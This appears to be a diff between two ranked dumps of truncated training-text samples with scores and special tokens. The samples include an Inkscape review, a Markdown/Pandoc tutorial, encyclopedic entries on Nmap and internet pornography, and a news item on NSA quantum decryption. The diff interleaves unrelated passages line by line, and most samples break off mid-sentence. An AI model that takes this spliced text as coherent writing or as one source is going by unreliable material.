the primary source filetype, which is getting more and more popular as a format for vector graphics on the web. Inkscape can also export to a wide range of different formats, including PNG and PDF. +Today we’re going to build an amazing Markdown editor using Visual Studio Code and Pandoc. This system will include real-time Markdown linting and the ability to generate html, docx, and pdf documents quickly with the potential to produce many other document formats as well. -Inkscape 0.91 is a huge improvement over the previous 0.48 release, with the inkscape developers fixing hundreds of bugs, introducing a wide range of new tools and features, and also making Inkscape perform much, much better. +Markdown is a simple markup language that allows one to write documents using a text editor and transform those documents into many different formats. Among other things, it works beautifully for documenting source code since the Markdown documents can be checked in and versioned with Git or your source control system of choice. -Stability and Performance +Pandoc is a highly capable “Swiss army knife” tool for converting documents between various formats. It is not limited to Markdown as an input (source) format, but it is used extensively in this context. -The Inkscape developers did a lot of work in this release to improve the performance and stability of Inkscape. I have been using development versions of Inkscape 0.91 for over a year now, and noticed a huge reduction in the number of times Inkscape stalled or crashed during use. +Finally, Visual Studio Code is a solid, lightweight code editor created by Microsoft. It is based on the Electron framework, which facilitates the development of desktop GUI applications using the Node.js framework. I’m a huge fan of VS Code, and have written previous articles about it including the... -Additionally, Inkscape 0.91 includes a new renderer based on Cairo, which is noticeably faster at rendering complex drawings with lots of SVG filters like blurs, and also caches parts of complex drawings to improve rendering times when editing. +Let’s get started! -Inkscape now uses threading when rendering filter effects, so users with newer machines with multiple processing cores will notice a difference when rendering complex images. Inkscape also now uses up to 25% less memory on some complex drawings. +Install Visual Studio Code... -New Features +Familiarize yourself with VS Code out-of-the-box Markdown features... -Inkscape 0.91 delivers a wide range of features that improve and simplify drawing and illustrating in Inkscape. +Try Markdown previewer... -New measurement tool +Markdown Snippets... -0.91 introduces a new tool that allows users to measure the distances and angles between objects in an inkscape drawing by drawing a “ruler” over the objects. Using this tool is super simple, just draw a live over your objects, and the distances and angles will live-update on canvas as you move your mouse +Install Markdown linter... -Font and Text Improvements +Test drive Markdown linting... -The inkscape developers did a lot of work in the 0. -================================================================================ -Rank = 48; Score = 3555328.0 -<|begin_of_text|>Quality of life (QOL) is an overarching term for the quality of the various domains in life. It is a standard level that consists of the expectations of an individual or society for a good life. These expectations are guided by the values, goals and socio-cultural context in which an individual lives. It is a subjective, multidimensional concept that defines a standard level for emotional, physical, material and social well-being. It serves as a reference against which an individual or society can measure the different domains of one’s own life. The extent to which one's own life coincides with this desired standard level, put differently, the degree to which these domains give satisfaction and as such contribute to one's subjective well-being, is called life satisfaction. +Install Pandoc Extension... -Overview [ edit ] +Create configuration files to make a great Markdown editor... -Quality of life is the general well-being of individuals and societies, outlining negative and positive features of life. It observes life satisfaction, including everything from physical health, family, education, employment, wealth, safety, security to freedom, religious beliefs, and the environment.[1] QOL has a wide range of contexts, including the fields of international development, healthcare, politics and employment. It is important not to mix up the concept of QOL with a more recent growing area of health related QOL (HRQOL[2]). An assessment of HRQOL is effectively an evaluation of QOL and its relationship with health. +Create settings.json file... -Quality of life should not be confused with the concept of standard of living, which is based primarily on income. +Create Markdown lint configuration file... -Standard indicators of the quality of life include not only wealth and employment but also the built environment, physical and mental health, education, recreation and leisure time, and social belonging.[3][4] According to the World Health Organization (WHO), quality of life is defined as “the individual’s perception of their position in life in the context of the culture and value systems in which they live and in relation to their goals.” In comparison to WHO's definitions, the Wong-Baker Faces Pain Rating Scale defines quality of life as “life quality (in this case, physical pain) at a precise moment in time.”[5] +Create CSS file to be used by HTML generated by Pandoc... -According to ecological economist Robert Costanza: +Create an HTML Document with Pandoc... -While Quality of Life (QOL) has long been an explicit or implicit policy goal, adequate definition and measurement have been elusive. Diverse "objective" and "subjective" indicators across a range of disciplines and scales, and recent work on subjective well-being (SWB) surveys and the psychology of happiness have spurred renewed interest.[6] +Conclusion -One approach, called engaged theory, outlined +You have now created an awesome Markdown editor/environment that you can use for all of your documentation needs! Pandoc provides a number of other conversion options that you can either add in the VS Code configuration or run from the command line to produce other document formats, create books, etc. You now have an amazing Markdown editor. Go have fun with it! + +Follow Dave Johnson @thisDaveJ on Twitter to stay up to date on the latest tutorials and tech articles. + +... [Click through to read the entire post]<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 49; Score = 3522560.0 +Rank = 49; Score = 2039808.0 +<|begin_of_text|>We think our destiny is to journey to Mars and beyond. Yet as we build our spacecraft, we're about to be broadsided - from a different direction - by the most explosive event in history. + +Sometime in the future science will be able to create realities that we can't even begin to imagine. As we evolve, we'll be able to construct other information systems that correspond to other realities, universes based on logic completely different from ours and not based on space and time. + +Immanuel Kant declared in 1781 that space and time were real, but only indeed as properties of the mind. These algorithms are not only the key to consciousness, but why space and time − indeed the properties of matter itself - are relative to the observer. But a new theory called biocentrism suggests that space and time may not be the only tools that can be used to construct reality. At present, our destiny is to live and die in the everyday world of up and down. But what if, for example, we changed the algorithms so that instead of time being linear, it was 3-dimensional like space? Consciousness would move through the multiverse. We'd be able to walk through time just like we walk through space. And after creeping along for 4 billion years, life would finally figure out how to escape from its corporeal cage. Our destiny would lie in realities that exist outside of the known physical universe. + +Even science fiction is struggling with the implications. In "Avatar," human consciousness is infused into blue aliens that inhabit a wondrous world. However, according to biocentrism, replicating human intelligence or consciousness will require the same kind of algorithms for employing time and space that we enjoy. Everything we experience is a whirl of information occurring in our heads. Time is simply the summation of spatial states - much like the frames in a film - occurring inside the mind. It's just our way of making sense of things. There's also a peculiar intangibility to space. We can't pick it up and bring it to the laboratory. Like time, space isn't an external object. It's part of the mental software that molds information into multidimensional objects. + +We take for granted how our mind puts everything together. When I woke up this morning, I was in the middle of a dream that seemed as real as everyday life. I remember looking out over a crowded port with people in the foreground. Further out, there were ships engaged in battle. And still further out to sea was a battleship with +================================================================================ +Rank = 50; Score = 2039808.0 <|begin_of_text|>"Touch" redirects here. For other uses, see Touch (disambiguation) Widely distributed parts of the sensory nervous system @@ -1253,22 +1200,28 @@ Merkel cell nerve endings are found in the basal epidermis and hair follicles; t Tactile corpuscles react to moderate vibration (10–50 Hz) and light touch. They are located in the dermal papillae ================================================================================ -Rank = 50; Score = 3522560.0 -<|begin_of_text|>Counter heat current exchange: Note the gradually declining differential and that the once hot and cold streams exit at the reversed temperature difference; the hotter entering stream becomes the exiting cooler stream and vice versa. +Rank = 51; Score = 2015232.0 +<|begin_of_text|>Researchers at North Carolina State University have developed techniques that can be used to create ideal geometric phase holograms for any kind of optical pattern -- a significant advance over the limitations of previous techniques. The holograms can be used to create new types of displays, imaging systems, telecommunications technology and astronomical instruments. -Countercurrent exchange is a mechanism occurring in nature and mimicked in industry and engineering, in which there is a crossover of some property, usually heat or some chemical, between two flowing bodies flowing in opposite directions to each other. The flowing bodies can be liquids, gases, or even solid powders, or any combination of those. For example, in a distillation column, the vapors bubble up through the downward flowing liquid while exchanging both heat and mass. +A geometric phase hologram is a thin film that manipulates light. Light moves as a wave, with peaks and troughs. When the light passes through a geometric phase hologram, the relationship between those peaks and troughs is changed. By controlling those changes, the hologram can focus, disperse, reorient or otherwise modify the light. -The maximum amount of heat or mass transfer that can be obtained is higher with countercurrent than co-current (parallel) exchange because countercurrent maintains a slowly declining difference or gradient (usually temperature or concentration difference). In cocurrent exchange the initial gradient is higher but falls off quickly, leading to wasted potential. For example, in the adjacent diagram, the fluid being heated (exiting top) has a higher exiting temperature than the cooled fluid (exiting bottom) that was used for heating. With cocurrent or parallel exchange the heated and cooled fluids can only approach one another. The result is that countercurrent exchange can achieve a greater amount of heat or mass transfer than parallel under otherwise similar conditions. See: flow arrangement. +An ideal geometric phase hologram modifies the light very efficiently, meaning that little of the light is wasted. But ideal geometric phase holograms can also produce three different, well-defined "wavefronts" -- or transformed versions of the light that passes through the thin film. -Countercurrent exchange when set up in a circuit or loop can be used for building up concentrations, heat, or other properties of flowing liquids. Specifically when set up in a loop with a buffering liquid between the incoming and outgoing fluid running in a circuit, and with active transport pumps on the outgoing fluid's tubes, the system is called a countercurrent multiplier, enabling a multiplied effect of many small pumps to gradually build up a large concentration in the buffer liquid. +"We can direct light into any one or more of those three wavefronts, which allows us to use a single ideal geometric phase hologram in many different ways," says Michael Escuti, a professor of electrical and computer engineering at NC State and corresponding author of a paper on the work. -Other countercurrent exchange circuits where the incoming and outgoing fluids touch each other are used for retaining a high concentration of a dissolved substance or for retaining heat, or for allowing the external buildup of the heat or concentration at one point in the system. +Previously, researchers were only able to make ideal geometric phase holograms in a limited set of simple patterns, curtailing their usefulness for new applications. This is because making these holograms involves orienting molecules or structures at a scale smaller than the wavelength of light. -Countercurrent exchange circuits or loops are found extensively in nature, specifically in biologic systems. In vertebrates, they are called a rete mirabile, originally the name of an organ in fish gills for absorbing oxygen from the water. It is mimicked in industrial systems. Countercurrent exchange is a key concept in chemical engineering thermodynamics and manufacturing processes, for example in extracting sucrose from sugar beet roots. +"We've come up with two ways of making ideal geometric phase holograms that are relatively simple but allow us to control the orientation of the molecules that ultimately manipulate the light," Escuti says. -Countercurrent multiplication is a similar +First, the researchers use lasers to create a high-fidelity light pattern, either by taking advantage of how waves of light interfere with each other, or by using a tightly focused laser to scan through a pattern -- much like a laser printer. + +A photoreactive substrate records the light pattern, with each molecule in the substrate orienting itself depending on the polarization of the light it was exposed to. To understand this, think of a beam of light as a wavy string, traveling from left to right. That string is also vibrating up and down -- creating wiggles are that are perpendicular to the direction the string is traveling. Controlling the orientation angle of the light's linear polarization just means controlling the direction that the wave is wiggling. + +The pattern that is recorded on the substrate then serves as a template for a liquid crystal layer that forms the finished hologram. + +"Using these techniques, ================================================================================ -Rank = 51; Score = 3506176.0 +Rank = 52; Score = 2015232.0 <|begin_of_text|>But more important for the students, the various A-Lab projects served as a concrete learning experience on what data science is all about, - how to leverage messy, incomplete, real-world data to shed light on a complex and not-so-well-defined problem. A-Lab received over 20 project proposals from different companies, of which 13 were selected by the students. Each project team was assigned a research mentor to provide guidance as appropriate. I mentored a 3-student team that worked on a project sponsored by MasterCard. The students explored the possibility of improving on predictions of the economic performance of emerging markets by coupling existing economic indicators data with consumer behavior based on MasterCard’s transaction data. This is a particularly interesting project because economic data in emerging markets is often not as reliable as the data in more advanced markets. @@ -1285,7 +1238,51 @@ Amazon, for example, sponsored a project on how to raise the share of wallet of The 2015 A-Lab class culminated with short presentations of each of the student projects before an audience that included company sponsors and mentors. As I listened to the 13 presentations, I was impressed by the potential of applying big data and analytics to all kinds of business problems, from the tactical decisions every business makes as part of its normal operations to the strategic ================================================================================ -Rank = 52; Score = 3424256.0 +Rank = 53; Score = 2015232.0 +<|begin_of_text|>Internet pornography is any pornography that is accessible over the Internet, primarily via websites, peer-to-peer file sharing, or Usenet newsgroups. The availability of widespread public access to the World Wide Web in late 1990s led to the growth of Internet pornography. + +A 2015 study finds "a big jump"[1] in pornography viewing over the past few decades, with the largest increase occurring between people born in the 1970s and those born in the 1980s. While the study's authors note this increase is "smaller than conventional wisdom might predict," it's still quite significant. Children born in the 1980s onward are also the first to grow up in a world where they have access to the Internet beginning in their teenage years, and this early exposure and access to Internet pornography may be the primary driver of the increase.[1] The sex and tech conference series Arse Elektronika dedicated their 2007 conference to what they call pr0nnovation. The con presented a keynote by culture theorist Mark Dery and published a reader about the subject. + +As of 2018, a single company, MindGeek, owns and operates many popular[2] pornographic websites, including video sharing services Pornhub, RedTube, and YouPorn, as well as adult film producers Brazzers, Digital Playground, Men.com, Reality Kings, and Sean Cody, among others.[3] It has been alleged to be a monopoly.[3] + +History and methods of distribution + +Before the World Wide Web + +Pornography is regarded by some as one of the driving forces behind the expansion of the World Wide Web, like the camcorder VCR and cable television before it.[4] Pornographic images had been transmitted over the Internet as ASCII porn but to send images over network needed computers with graphics capability and also higher network bandwidth. This was possible in the late 1980s and early 1990s through the use of anonymous FTP servers and through the Gopher protocol. At this time the internet was mainly an academic and military network and there was not widespread use of the internet. One of the early Gopher/FTP sites was at tudelft and was called the Digital Archive on the 17th Floor (List of websites founded before 1995). This small image archive contained some low quality scanned pornographic images that were initially available to anyone anonymously, but the site soon became restricted to Netherlands only access. + +Usenet groups + +Usenet newsgroups provided an early way of sharing +================================================================================ +Rank = 54; Score = 1990656.0 +<|begin_of_text|>Image caption The NSA wants to use its quantum computer to break encryption used to protect online communication + +The US National Security Agency is building a quantum computer to break the encryption that keeps messages secure, reports the Washington Post. + +The NSA project came to light in documents passed to the newspaper by whistle-blower Edward Snowden. + +The spying agency hopes to harness the special qualities of quantum computers to speed up its code-cracking efforts. + +The NSA is believed to have spent about $80m (£49m) on the project but it has yet to produce a working machine. + +If the NSA managed to develop a working quantum computer it would be put to work breaking encryption systems used online and by foreign governments to keep official messages secure, suggest the documents excerpted in the Post. + +The quantum computer is being developed under a research programme called Penetrating Hard Targets and is believed to be conducted out of a lab in Maryland. + +Processing power + +Many research groups around the world are pursuing the goal of creating a working quantum computer but those developed so far have not been able to run the algorithms required to break contemporary encryption systems. + +Current computers attempt to crack encryption via many different means but they are limited to generating possible keys to unscramble data one at a time. Using big computers can speed this up but the huge numbers used as keys to lock away data limits the usefulness of this approach. + +By contrast, quantum computers exploit properties of matter that, under certain conditions, mean the machine can carry out lots and lots of calculations simultaneously. This makes it practical to try all the possible keys protecting a particular message or stream of data. + +The hard part of creating a working quantum computer is keeping enough of its constituent computational elements, called qubits, stable so they can interact and be put to useful work. + +The NSA is not believed to have made significant breakthroughs in its work that would put it ahead of research efforts elsewhere in the US and Europe. However, the documents passed to the Post by Edward Snowden suggest the agency's researchers are having some success developing the basic building blocks for the machine.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 55; Score = 1982464.0 <|begin_of_text|>Guidelines for a better Web User Experience Although a user’s experience on a website is largely subjective, there are several things you can do to ensure that visitors return to your site. @@ -1304,223 +1301,191 @@ Call Christopher Dabhi at 484-892-5713 now to schedule your free consultation wi The design of your website is the most important factor to a user. A solid design incorporates the principles of human-computer interaction (HCI) and facilitates easy and intuitive user navigation by employing the– your website or app should provide iconic representation of its facets and use white space efficiently for readability and a comfortable aesthetic.The design should be. In an era where new devices and operating systems seem to be released every day, a single site with multiple capabilities to function on desktops, tablets, mobile phones, and other web-accessible devices is sorely needed. The most popular framework for developing responsive websites is Bootstrap.is also key to a good user experience. For a user to feel engaged, your website or app should feature calls to action, search prompts, and easy navigation. Interactivity can be enhanced through audio or video media, hover states, scroll events, and sliding interfaces.It’s also important to keep user clicks to a. You should cut down on tasks or actions required by users to create a simplified and streamlined experience that lets them find the content they need without spending excess time clicking through other pages to get there.that you provide on your website is also very important. A web page should not be verbose. Think of each page as a paragraph in an essay, where each section ================================================================================ -Rank = 53; Score = 3358720.0 -<|begin_of_text|>network scanner - -Nmap (Network Mapper) is a free and open-source network scanner created by Gordon Lyon (also known by his pseudonym Fyodor Vaskovich).[3] Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. - -Nmap provides a number of features for probing computer networks, including host discovery and service and operating system detection. These features are extensible by scripts that provide more advanced service detection,[4] vulnerability detection,[4] and other features. Nmap can adapt to network conditions including latency and congestion during a scan. +Rank = 56; Score = 1966080.0 +<|begin_of_text|>PYNQ is an open-source project that makes it easy for you to design embedded systems using the Xilinx Zynq-7000 SoC using the Python language, associated libraries, and the Jupyter Notebook, which is a pretty nice, collaborative learning and development environment for many programming languages including Python. PYNQ allows you to exploit the benefits of programmable logic used together with microprocessors to build more capable embedded systems with superior performance when performing embedded tasks such as: -Nmap started as a Linux utility[5] and was ported to other systems including Windows, macOS, and BSD.[6] Linux is the most popular platform, followed by Windows.[7] +High frame-rate video processing -Features [ edit ] +Hardware-accelerated algorithms -Nmap features include: +Real-time signal processing -Host discovery – Identifying hosts on a network. For example, listing the hosts that respond to TCP and/or ICMP requests or have a particular port open. +High-bandwidth I/O -Port scanning – Enumerating the open ports on target hosts. +Low-latency control -Version detection – Interrogating network services on remote devices to determine application name and version number. [8] +Nearly every embedded system needs to run one or more such tasks. The programmable hardware on the Zynq SoC just makes this job a lot easier. -OS detection – Determining the operating system and hardware characteristics of network devices. +The PYNQ-Z1 based on the Xilinx Zynq Z-7020 SoC is the first dev board to support PYNQ and it just showed up on the Digilent Web site, listing for $229. (Digilent’s academic price for the PYNQ-Z1 is only $65!) -Scriptable interaction with the target – using Nmap Scripting Engine[9] (NSE) and Lua programming language. +Digilent PYNQ-Z1 Dev Board -Nmap can provide further information on targets, including reverse DNS names, device types, and MAC addresses.[10] +Here’s what’s on the PYNQ-Z1 board: -Typical uses of Nmap: +Xilinx Zynq Z-7020 SoC with a dual-core ARM Cortex-A9 MPCore processor running at 650MHz -Auditing the security of a device or firewall by identifying the network connections which can be made to, or through it. [11] +512Mbytes of DDR3 SDRAM running at 1050MHz -Identifying open ports on a target host in preparation for auditing. [12] +16Mbytes of Quad-SPI Flash memory -Network inventory, network mapping, maintenance and asset management. +A MicroSD slot for the PYNQ environment -Auditing the security of a network by identifying new servers. [13] +USB OTG host port -Generating traffic to hosts on a network, response analysis and response time measurement. [14] +USB programming port -Finding and exploiting vulnerabilities in a network. [15] +Gigabit Ethernet port -DNS queries and subdomain search +Microphone -User interfaces [ edit ] +Mono audio output jack -NmapFE, originally written by Zach Smith, was Nmap's official GUI for Nmap versions 2.2 to 4.22.[16] For Nmap 4.50 (originally in the 4.22SOC development series) NmapFE was replaced with Zenmap, a new official graphical user interface based on UMIT, developed by Adriano Monteiro Marques. +HDMI input port -Various web-based interfaces allow controlling Nmap or analysing Nmap results from a -================================================================================ -Rank = 54; Score = 3358720.0 -<|begin_of_text|>JREF Swift Blog +HDMI output port -The Lurking Pornographer: Why Your Brain Turns Bubbles Into Nude Bodies +Two Digilent PMOD ports -There is a pornographer lurking in some corner of your mind. He peeks out from behind the curtains of your consciousness without warning, and almost never at an acceptable time. +Arduino-format header for Arduino shields -The lurking pornographer in your brain is ever vigilant, looking for patterns, for signs of nudity, and sometimes generating them out of nowhere. He is exceedingly good at what he does, and isn’t afraid to prove his power over your perception. Just like that, he can take a picture of Daniel Craig in a bathing suit and turn it obscene. +Pushbuttons, switches, and LEDs -If anything, Craig is more covered than he was before, but still he must be nude in the new picture, or so the pornographer would have you believe. The pornographer is sly. He takes advantage in the slightest slip in shapes and curves to insert his nudity. One of his favorite techniques is called “bubbling,” a technique that reveals how our brains actually “see.”. +That’s a lot of board for $229—and it’s pink! -Breasts and Blind Spots +Here’s what PYNQ is, really: It’s for software developers and students who want to take advantage of the improved embedded performance made possible by the Zynq SoC’s programmable hardware without having to use ASIC-style (HDL) design tools to design hardware. -Stifled by the pornography-restricting tenets of his religion, a young Mormon took to Photoshop, or so the story goes. His attempt to fool God and circumvent his law resulted in “bubbling,” a trick clever enough that how it works hasn’t yet been answered. +For even better performance, you can also program the PYNQ-Z1 with C or C++ using the Xilinx SDK software development environment, available in the no-cost Xilinx Vivado HL Design Suite WebPACK. -You eye doesn’t see everything. Right now, there are innumerable photons hitting the photoreceptors all over your retina, except in the place where your optic nerve connects to it. This area is your blind spot, and it should show up as a rather large black dot in your vision, but it doesn’t. Why not? +The PYNQ-Z1 and the PYNQ project make it possible to create a lot of really interesting systems, so just what are you waiting for? -As your brain matures, it learns from the world. Neuronal connections are formed and broken in accordance with the deluge of information your brain receives. Over time, your brain becomes adept at predicting the world, so much so that much of our conscious lives are spent only noticing when things aren’t going as predicted. For example, there was probably a time when you got out of the car and realized you have almost no recollection of the drive you just took. It seemed automatic because it was. Consciousness didn’t need to intrude during something so routine, so it didn’t. However, introduce a near-collision into your daily commute, and consciousness quickly steps up to handle the situation. -Based on all the shapes and colors and lines and lighting schemes that your brain has encountered, your cognition makes predictions about how things will look. The surprising ================================================================================ -Rank = 55; Score = 3342336.0 -<|begin_of_text|>Are we on the verge of creating artificial intelligence capable of finding answers to the world’s most pressing challenges? After steady progress in basic AI tasks in recent years, this is the vision that some leading technologists have for AI. And yet, how we will make this grand leap is anyone’s guess. - -Eric Schmidt, the executive chairman of Alphabet (formerly Google), says AI could be harnessed to help solve major challenges, including climate change and food security. Speaking at an event convened in New York this week to discuss the opportunities and risks in AI, Schmidt offered no details on how the technology might be adapted for such complex and abstract problems. - -Demis Hassabis, CEO of Google Deepmind, a division within Google doing groundbreaking work in machine learning, and which aims to bring about an “artificial general intelligence” (see “Google’s Intelligence Designer”), said the goal of this effort was to harness AI for grand challenges. “If we can solve intelligence in a general enough way, then we can apply it to all sorts of things to make the world a better place,” he said. - -And the chief technology officer of Facebook, Mike Schroepfer, expressed similar hope. “The power of AI technology is it can solve problems that scale to the whole planet,” he said. +Rank = 57; Score = 1916928.0 +<|begin_of_text|>Genetically modified animals are animals that have been genetically modified for a variety of purposes including producing drugs, enhancing yields, increase resistance to disease, etc. The vast majority of genetically modified animals are at the research stage with the number close to entering the market remains small.[1] -Eric Schmidt +Production [ edit ] -A steady stream of advances—mostly enabled by the latest machine-learning techniques—are indeed empowering computers to do ever more things, from recognizing the contents of images to holding short text or voice conversations. These advances seem destined to change the way computers are used in many industries, but it’s far from clear how the industry will go from captioning images to tackling poverty and climate change. +The process of genetically engineering mammals is a slow, tedious, and expensive process.[2] As with other genetically modified organisms (GMOs), first genetic engineers must isolated the gene they wish to insert into the host organism. This can be taken from a cell containing the gene[3] or artificially synthesised.[4] If the chosen gene or the donor organism's genome has been well studied it may already be accessible from a genetic library. The gene is then combined with other genetic elements, including a promoter and terminator region and usually a selectable marker.[5] -In fact, speaking after his talk, Schroepfer was eager to limit expectations, at least in the short term. Schroepfer said that recent advances were not enough to allow machines to reach human levels of intelligence, and that two dozen or more “major breakthroughs” would be needed before this happened. And he said many people apparently had the wrong idea about how rapidly the field was moving. “People see one cool example, and then extrapolate from that,” he said. +A number of techniques are available for inserting the isolated gene into the host genome. With animals DNA is generally inserted into using microinjection, where it can be injected through the cell's nuclear envelope directly into the nucleus, or through the use of viral vectors.[6] The first transgenic animals were produced by injecting viral DNA into embryos and then implanting the embryos in females.[7] It is necessary to ensure that the inserted DNA is present in the embryonic stem cells.[8] The embryo would develop and it would be hoped that some of the genetic material would be incorporated into the reproductive cells. Then researchers would have to wait until the animal reached breeding age and then offspring would be screened for presence of the gene in every cell, using PCR, Southern hybridization, and DNA sequencing.[9] -The event, organized by New York University as well as companies leading the effort to harness artificial intelligence, including Facebook and Google, comes at a delicate moment for academic researchers and companies riding the wave of progress in AI. Progress seems certain to revolutionize many industries, perhaps with negative consequences, such as eradicating certain jobs (see “Who Will Own the Robots?”). It will surely also raise +New technologies are making genetic modifications easier and more precise.[2] Gene targeting techniques, which creates double-stranded breaks and takes advantage on the cells natural homologous recombination repair systems, have been developed to target insertion to exact locations. Genome editing uses artificially engineered nucleases that create breaks at specific points. There are four families of engineered nucleases: meganucleases,[10][11] zinc finger nucleases,[12][13] transcription activator-like effector nucleases (TALENs),[14][15] and the Cas9-guideRNA system (adapted from CRISPR).[16][17] TALEN and CRISPR are the two most commonly used and each has its own advantages.[18] TALENs have greater target specificity, while CRISPR is easier to design and more efficient.[18] The development of the CRISPR-C ================================================================================ -Rank = 56; Score = 3342336.0 -<|begin_of_text|>Internet pornography is any pornography that is accessible over the Internet, primarily via websites, peer-to-peer file sharing, or Usenet newsgroups. The availability of widespread public access to the World Wide Web in late 1990s led to the growth of Internet pornography. - -A 2015 study finds "a big jump"[1] in pornography viewing over the past few decades, with the largest increase occurring between people born in the 1970s and those born in the 1980s. While the study's authors note this increase is "smaller than conventional wisdom might predict," it's still quite significant. Children born in the 1980s onward are also the first to grow up in a world where they have access to the Internet beginning in their teenage years, and this early exposure and access to Internet pornography may be the primary driver of the increase.[1] The sex and tech conference series Arse Elektronika dedicated their 2007 conference to what they call pr0nnovation. The con presented a keynote by culture theorist Mark Dery and published a reader about the subject. +Rank = 58; Score = 1916928.0 +<|begin_of_text|>JREF Swift Blog -As of 2018, a single company, MindGeek, owns and operates many popular[2] pornographic websites, including video sharing services Pornhub, RedTube, and YouPorn, as well as adult film producers Brazzers, Digital Playground, Men.com, Reality Kings, and Sean Cody, among others.[3] It has been alleged to be a monopoly.[3] +The Lurking Pornographer: Why Your Brain Turns Bubbles Into Nude Bodies -History and methods of distribution +There is a pornographer lurking in some corner of your mind. He peeks out from behind the curtains of your consciousness without warning, and almost never at an acceptable time. -Before the World Wide Web +The lurking pornographer in your brain is ever vigilant, looking for patterns, for signs of nudity, and sometimes generating them out of nowhere. He is exceedingly good at what he does, and isn’t afraid to prove his power over your perception. Just like that, he can take a picture of Daniel Craig in a bathing suit and turn it obscene. -Pornography is regarded by some as one of the driving forces behind the expansion of the World Wide Web, like the camcorder VCR and cable television before it.[4] Pornographic images had been transmitted over the Internet as ASCII porn but to send images over network needed computers with graphics capability and also higher network bandwidth. This was possible in the late 1980s and early 1990s through the use of anonymous FTP servers and through the Gopher protocol. At this time the internet was mainly an academic and military network and there was not widespread use of the internet. One of the early Gopher/FTP sites was at tudelft and was called the Digital Archive on the 17th Floor (List of websites founded before 1995). This small image archive contained some low quality scanned pornographic images that were initially available to anyone anonymously, but the site soon became restricted to Netherlands only access. +If anything, Craig is more covered than he was before, but still he must be nude in the new picture, or so the pornographer would have you believe. The pornographer is sly. He takes advantage in the slightest slip in shapes and curves to insert his nudity. One of his favorite techniques is called “bubbling,” a technique that reveals how our brains actually “see.”. -Usenet groups +Breasts and Blind Spots -Usenet newsgroups provided an early way of sharing -================================================================================ -Rank = 57; Score = 3342336.0 -<|begin_of_text|>A cinematographer is also known as a director of photography. They’re the guys that make the movies we watch look how they look. It’s their photographic eye that we see. And they don’t get too much recognition for the work they do, with most of the attention going towards the director and actor already. I wanted to write about a few good ones and see if it can become a weekly thing if you guys are into it. You probably know the work these guys have done, so I’ll cover what they did to get the shots that we see on the big screen. +Stifled by the pornography-restricting tenets of his religion, a young Mormon took to Photoshop, or so the story goes. His attempt to fool God and circumvent his law resulted in “bubbling,” a trick clever enough that how it works hasn’t yet been answered. -If this is going to be the first out of more to come, I’ll start it off with a bang by focusing it on Roger Deakins. +You eye doesn’t see everything. Right now, there are innumerable photons hitting the photoreceptors all over your retina, except in the place where your optic nerve connects to it. This area is your blind spot, and it should show up as a rather large black dot in your vision, but it doesn’t. Why not? -Roger Deakins +As your brain matures, it learns from the world. Neuronal connections are formed and broken in accordance with the deluge of information your brain receives. Over time, your brain becomes adept at predicting the world, so much so that much of our conscious lives are spent only noticing when things aren’t going as predicted. For example, there was probably a time when you got out of the car and realized you have almost no recollection of the drive you just took. It seemed automatic because it was. Consciousness didn’t need to intrude during something so routine, so it didn’t. However, introduce a near-collision into your daily commute, and consciousness quickly steps up to handle the situation. -You’d probably have called him a purist; Roger Deakins’ preferred medium was film, until around 2011, when he stepped into the digital world when the Alexa cameras caught his eye. +Based on all the shapes and colors and lines and lighting schemes that your brain has encountered, your cognition makes predictions about how things will look. The surprising +================================================================================ +Rank = 59; Score = 1900544.0 +<|begin_of_text|>Document Clustering -“I prefer Super 35 because it allows you to use short focal-length lenses. I also like the scale of that format — the intimacy — and the texture of the film grain. In some cases I find anamorphic to be almost too clean, too grain-free and pristine.” (AC Magazine, October 2007) +Contents -Regardless of what he uses, he uses it to its fullest potential. If you’ve seen The Shawnshank Redemption, No Country for Old Men, The Assassination of Jesse James, Skyfall or even How to Train Your Dragon, you’ve seen his work. The guy’s got a resume, and it’s a wonder that none of his work has placed him an oscar yet. Here’s how a few of his most iconic shots were done: +Document clustering is the act of collecting similar documents into bins, where similarity is some function on a document. The 